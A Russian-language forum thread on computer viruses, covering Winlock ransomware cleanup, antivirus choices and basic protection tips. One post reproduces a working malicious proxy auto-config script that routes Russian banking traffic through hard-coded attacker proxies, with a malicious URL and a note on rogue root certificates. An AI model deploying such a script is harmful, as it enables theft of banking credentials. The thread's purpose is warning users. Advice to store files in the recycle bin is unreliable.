Компьютерные вирусы и антивирусы

[Rio]

попалась тут система с зараженным userinit.exe

правишь HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

с какого-то файла из documents and settings на значение explorer.exe

перезагружаешься, снова появляется страшная надпись, что сейчас все будет удалено, и все данные, и вся система, и весь биос, и даже небо... и вам ничего не поможет.

прогнал LiveCD cureit, нашел зараженные файлы в профиле, зараженный userinit.exe в system32 и в dllcache

удалил их

в венду зайти под пользователем конечно не удается.

скопировал userinit.exe с произвольного компа, все заработало.

ЗЫ говорят дочка решила установить прикольный скринсейвер из вконтактега, вот и получили прикольный скринсейвер скачать бесплатно без смс

Про лайв сд: доктор веба работает что-то долго последнее время, порядка 8 часов. Быстрой проверкой не находит. А касперский вообще ничего не находит.

[riglik]

Так чем обезопаситься от этих блокираторов?

[Naves]

Про лайв сд: доктор веба работает что-то долго последнее время, порядка 8 часов. Быстрой проверкой не находит. А касперский вообще ничего не находит

в последнее время лайв-сиди вообще почти всегда в ребут уходит.

остается только вытаскивание харда и подключение к другой системе.

еще был случай, касперский со свежими базами не ругался на зараженную систему, пока принудительно не включил какой-то режим. Система была заражена ZeuS

Так чем обезопаситься от этих блокираторов?

не сидеть под администратором на компьютере, для начала.

Использовать обновленный браузер Firefox, Chrome.

Выключать плагины Oracle (Sun) Java, регулярно обновлять Adobe Flash Plugin, или тоже выключить

Обновлять ОС по возможности.

Firewall по возможности (но толку от него мало при неправильных настройках)

Не запускать всякую хрень СмотриКакойПрикольныйКартинка.жопеге.exe

бесплатный антивирус от яндекса и касперского, до конца света его хватит ссылка

[Балбес]

Так чем обезопаситься от этих блокираторов?

Не ходить в Интернет. Защита почти 100%

[riglik]

скачала лечилку доктора веба, мне тут серчено посоветовали, оч хорошая штука оказалась - сразу нашла винлока, якобы уже вылеченного и удаленного

пока скачаю демо-версию того же веба, потом посмотрю

[Балбес]

скачала лечилку доктора веба, мне тут серчено посоветовали, оч хорошая штука оказалась - сразу нашла винлока, якобы уже вылеченного и удаленного

пока скачаю демо-версию того же веба, потом посмотрю

Кьюр АйТи вообще должна быть в "аптечке" )))

[Nimibu]

Вылечит тот, кто знает, что лечить. Лечится на сегодняшний день все, кроме некоторых видов шифровальщиков. Юзеру приходится раскошеливаться, если на жд какаято супер важная инфо.

Лайф сиди нужен реально только в случаях с файловым вирем.. Активным. С винлоками и смсками давно справляется антисмс

ссылка

ссылка

Только банить не надо за ссылку - она весьма полезна юзерам Лыткарино в том числе, это не реклама, просто указываю путь к квалифицированной помощи.

Изменено 26 ноября, 2012 пользователем Nimibu

[Ибн-Саид]

Имею вопрос к спецам по прогам и вирусам. У меня раньше любой купленный диск mp3 с музыкой легко переписывался на комп и затем я перекидывал нужные вещи на плеер, чтобы слушать в дороге. С некоторых пор перестало переезжать с диска на комп, причем значок песни с диска на комп перетаскивается, но уже с компа эта песня не проигрывается (проигрыватель Winamp).

Может, это происки правообладателей, чтобы не копировали бесплатно? Типа разослали повсюду по Интернету соответствующую программу. Или это вирусология, Ваше мнение?

[Dr.Bormental]

Не думаю, что вирье или происки копирайтеров. Раз копируется, то чего ж еще? Не wma с DRM'ом же. Файл весит столько, сколько и на диске? Можно пример "нерабочего" файла, если это не приратство ?

[Naves]

мне кажется ты раньше и сейчас копируешь разные диски.

раньше ты копировал именно mp3 файлы, а сейчас ты вставил обычный audio-cd и пытаешься скопировать аудиодорожки. напрямую так просто это сделать нельзя.

Какая продолжительность музыки на твоем диске? Если меньше 100 миут, то это звуковой диск.

Чтобы перекодировать с компакт-диска в mp3 используются специальные программы, возможно раньше такая программа у тебя и стояла, и процесс копирования был прозрачным.

Еще кстати возможен вариант, в венде вроде была какая-то встроенная утилита для копирования дисков, но на некоторых дисках может стоять цифровая метка "защищено авторскими правами", и вендовая прога откажется копировать диск, тогда нужно воспользоваться другой программой.

Таких программ тысячи их, конкретно посоветовать не могу.

В комплекте с Nero Burning Rom должна идти

[Ибн-Саид]

мне кажется ты раньше и сейчас копируешь разные диски. раньше ты копировал именно mp3 файлы, а сейчас ты вставил обычный audio-cd и пытаешься скопировать аудиодорожки. напрямую так просто это сделать нельзя.

Точно. Этого я не знал. Спасибо. Наверное, действительно раньше стояла такая программа. Закачал себе FreeRIP, все стало ОК.

Изменено 11 февраля, 2013 пользователем Ибн-Саид

[Марина123]

Как вариант - да. Самое безопасное место. Ты хоть один вирус знаешь, который атакует корзину?

Действительно, я как-то и не подумала о корзине. Ведь на самом деле вирусы ее не атакуют. А то в последнее время часто они мой комп посещают, много важных документов потеряла. Уж не знаю как бороться. Спасибо за идею.

Изменено 2 января, 2015 пользователем Марина123

[ВикаВикуся]

Антивирусник нормальный установите и не нужно будет документы в корзине хранить. Я уже несколько лет пользуюсь антивирусом Аваст Фри ссылка и ни разу не было проблем. Удобная бесплатная программа, скачала скачиваешь на месяц антивирусник, а потом регистрируешься и на год, и все бесплатно. Аваст защищает комп даже от тех вирусов, которых нет в базе данных.

[Naves]

тут столкнулся с занятным вирусом на компе пользователя

Trojan.Multi.ProxyChanger.aa

function FindProxyForURL(url,host){

var P = "PROXY 146.185.213.110:8089"; P2 = "PROXY 62.76.179.132:8089";

if ((shExpMatch(host,"?nl?ne.r?b?ru")||

shExpMatch(host,"*cs?ank.r?")||

shExpMatch(host,"*inkoff.ru")||

shExpMatch(host,"www.av?ngard?ru"))||((

shExpMatch(host,"ava?g?rd?ru")||

shExpMatch(host,"retai?.?ayme?t.ru"))&&(shExpMatch(url,"https://*"))))

{return P;}

if (shExpMatch(host,"?n?ine.sbe?b?nk.r*"))

{return P2;}

return "DIRECT";}

если кратко, то данные настройки вбиваются в браузер, в результате, когда пользователь заходит на сайты банков, то данные идут через промежуточный сервер, со всеми вытекающими последствиями, осуществляется попытка кражи паролей на доступ к клиент-банкам. А как же шифрование, скажут некоторые. А никак, подмена корневых сертификатов в системе и трафик практически любого сайта будет аккуратно расшифровываться и снова зашифровываться. А как же подтверждение по смс, скажут другие. А кто может с уверенностью сказать, что их телефон чистый? Тут на днях приносили смартфон, в котором удивительным образом была установлена программа, которую нельзя удалить. Программа имела все права на все, интернет, телефонная книга, отправки и прием смс. В процессе допроса, выяснилось что ребенок что-то поставил для игры майнкрафт, а для этого он разрешил установку программ из непроверенных источников. Возвращаясь к вирусу. На компьютере стоял один из главных антивирусов нашей страны, он даже регулярно обновляется. Вот только проблема, он не может поймать все стотыщь-пицот скриптов, которые разбросаны на всех говно-сайтах страны (Если кушать соду каждый день...) И заблокировать все ссылки на этот страшный выше приведенный скрипт, хотя вот эта ссылка уже в базах

http://configspacs.com/k3ftGe/Guq9.uru

К чему я это все, и как страшно жить...

[Пузочес]

Naves, и как же вы выловили вирус?Ручками или антивирусником другого известного производителя?

[vadim-s]

Есть такая банковская группа "Сосьете Женераль" - они рекомендуют такой антивирус. Типа многие банки его используют

[Naves]

Пузочес,

Да пока никак не выловил, надо смотреть автозагрузку

судя по информации в интернете, он прописывает хитрые настройки в браузерах, в результате которой браузер сначала выкачивает одну фигню, которая потом выкачивает другую, в результате которой прописываются прокси. А на диске все чисто.

Сам антивирус реагирует только на некую область в памяти без указания какая программа заражена.

В интернете есть статьи в которых описывалось как один вирус удалял другой, тк сейчас банковские вирусы борятся за незаметность, а ботнеты борятся за ресурсы процессоров

vadim-s, информационная безопасность это же процесс, одним антивирусом не обойдешься

[Dr.Bormental]

А как же шифрование, скажут некоторые.

А никак, подмена корневых сертификатов в системе и трафик практически любого сайта будет аккуратно расшифровываться и снова зашифровываться.

Это он в хранилище добавит что ли О_о? Или все-таки появятся странные ругательства на самоподписанные сертификаты?

[Naves]

Да, доверенные корневые центры сертификации. После этого можно подписать любую цепочку сертификатов для любого сайта

ссылка

Причем гуглохром не дает подменять сертификаты для своих доменов

[Rio]

Есть такая банковская группа "Сосьете Женераль" - они рекомендуют такой антивирус. Типа многие банки его используют

Банки и прочие структуры серьезные едва ли обходятся одним антивирусом. Помимо мер информационной безопасности, есть еще всякие детекторы угроз, отдельная железка ставится, которая анализирует траффик, и по имеющимся базам поведенчески и по адресам обращений детектит что в сети не все ладно.

И, говорят, куда бы не ставили эту штуку - везде она показывает свою исключительную полезность.

[vadim-s]

Вы мне рассказываете про информационную безопасность банков, а я об антивирусе, который они рекомендуют клиентам. Не хотите не ставьте - всего делов-то.

[Dr.Bormental]

Банки и прочие структуры серьезные едва ли обходятся одним антивирусом. Помимо мер информационной безопасности, есть еще всякие детекторы угроз, отдельная железка ставится, которая анализирует траффик, и по имеющимся базам поведенчески и по адресам обращений детектит что в сети не все ладно.

И, говорят, куда бы не ставили эту штуку - везде она показывает свою исключительную полезность.

IDS уже не модно - IPS куда актуальнее. И чаще в виде модуля, нежели отдельной железки. Кстати, "антивирусные" модули тоже существуют. Но, что и так ясно, это решения сугубо энтерпрайзные и домашнему пользователю не нужны

Что же касается антивирусов, то мне видится, что ничего, кроме проверки по базе сигнатур как не было, так и нет. А значит никакой антивирус свежего зверька скорее всего не обнаружит. Поправьте меня, если это не так и уже появились чудо-эвристические анализаторы

Вы мне рассказываете про информационную безопасность банков, а я об антивирусе, который они рекомендуют клиентам. Не хотите не ставьте - всего делов-то.

Ну в корпоративном сегменте и нортоновский symantec очень любят. А стоит ли это..гм.. поделие использовать?

Изменено 7 апреля, 2015 пользователем Dr.Bormental

[vadim-s]

Ну в корпоративном сегменте и нортоновский symantec очень любят. А стоит ли это..гм.. поделие использовать?

Не знаю ...они предложили как альтернативу другим. А что? Думаете совсем никчёмный и стоит сносить?

[Dr.Bormental]

Ну почему же? Просто кто бы ни рекомендовал антивирус, полагаться на него можно лишь ограниченно. Я вот использую использую такой подход: основной антивирус + cureit + avz (при необходимости).

[Naves]

ну я думаю, если включить антивирь на максимальную параною, он бы и нашел бы подозрительную активность.

Но те компы, в которых система "летала" несколько лет назад, после установки антивиря теперь тормозят так, что становится грустно.

Гигабайт оперативы занят антивирем, дисковая активность съедается им же, хочется взять его и выключить.